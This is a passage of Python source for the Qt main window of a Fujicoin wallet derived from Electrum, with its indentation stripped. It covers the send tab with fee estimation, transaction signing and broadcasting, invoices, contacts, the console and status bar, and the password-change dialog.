# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Fujicoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Fujicoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Fujicoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Fujicoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Fujicoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid fujicoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
